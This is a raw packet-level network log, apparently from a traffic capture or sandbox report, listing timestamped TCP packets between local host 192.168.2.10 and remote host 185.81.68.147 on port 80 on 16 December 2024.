                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.965039015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.965128899 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.965847015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.965959072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.966049910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.966702938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.966716051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.966825008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.967694998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.967706919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.967809916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.968360901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.968374014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.968461037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.969204903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.969538927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.969645023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.970093966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.970105886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.970207930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.971071959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.971087933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.971196890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.971790075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.971860886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.971946001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.972712994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.972783089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.972923994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.973520041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.973587990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.973674059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.974605083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.974621058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.974720001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.975225925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.975374937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.975460052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.976351023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.976363897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.976447105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.977094889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.977108955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.977212906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.977942944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.978060007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.978171110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.978885889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.978900909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.978995085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.979739904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.980036020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.980122089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.980550051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.980662107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.980748892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.981558084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.981571913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.981662989 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.982422113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.982949018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.983026028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.983127117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.983386040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.983468056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.984102964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.984256983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.984340906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.985104084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.985117912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.985235929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.985810041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.985990047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.986073017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.986656904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.986773968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.986850977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.987618923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.987632036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.987724066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.988514900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.988527060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.988607883 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.989445925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.989459991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.989557981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.990148067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.990251064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.990343094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.991101980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.991116047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.991208076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.992034912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.992048979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.992127895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.993010044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.993022919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.993151903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:56.993870020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.002942085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.003056049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.003468037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.003480911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.003552914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.004272938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.004286051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.004369020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.004807949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.005142927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.005153894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.005213022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.006004095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.006017923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.006095886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.006933928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.006947041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.006987095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.007602930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.007616043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.007694006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.174484968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.174542904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.174643040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.174778938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.174902916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.174978971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.175654888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.175770998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.175854921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.176532984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.176582098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.176657915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.177434921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.177524090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.177599907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.178345919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.178358078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.178442001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.179182053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.179231882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.179311037 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.180030107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.180166006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.180248022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.180931091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.181037903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.181140900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.181776047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.181883097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.181962967 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.182679892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.182769060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.182849884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.183516979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.183629990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.183715105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.184417963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.184540987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.184623957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.185286999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.185411930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.185492039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.186261892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.186372042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.186454058 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.187074900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.187165022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.187269926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.187983990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.188101053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.188179016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.188787937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.188904047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.188982010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.189791918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.189882040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.189953089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.190568924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.190671921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.190747976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.191440105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.191560030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.191632986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.192342043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.192445993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.192553043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.193181992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.193228960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.193325043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.194073915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.194180012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.194259882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.194947004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.195074081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.195167065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.195828915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.195951939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.196033001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.196728945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.196837902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.196921110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.197616100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.197691917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.197771072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.198447943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.198503971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.198590040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.199338913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.199454069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.199531078 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.200192928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.200311899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.200391054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.201091051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.201174974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.201322079 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.201937914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.202044964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.202235937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.202843904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.202959061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.203035116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.203707933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.203849077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.203984976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.204576969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.204694986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.204768896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.205493927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.205576897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.205653906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.206353903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.206478119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.206557035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.207230091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.207343102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.207422018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.208096981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.208209038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.208291054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.209121943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.209290028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.209366083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.209851980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.210098028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.210169077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.210789919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.210886955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.210967064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.211661100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.211772919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.211852074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.212482929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.212507010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.212589025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.213367939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.213483095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.213610888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.214255095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.214416981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.214493990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.215107918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.215233088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.215461969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.215984106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.216104031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.216177940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.216887951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.216974020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.217166901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.217772007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.217889071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.217969894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.218625069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.218709946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.218790054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.219497919 CET8049723185.81.68.147192.168.2.10
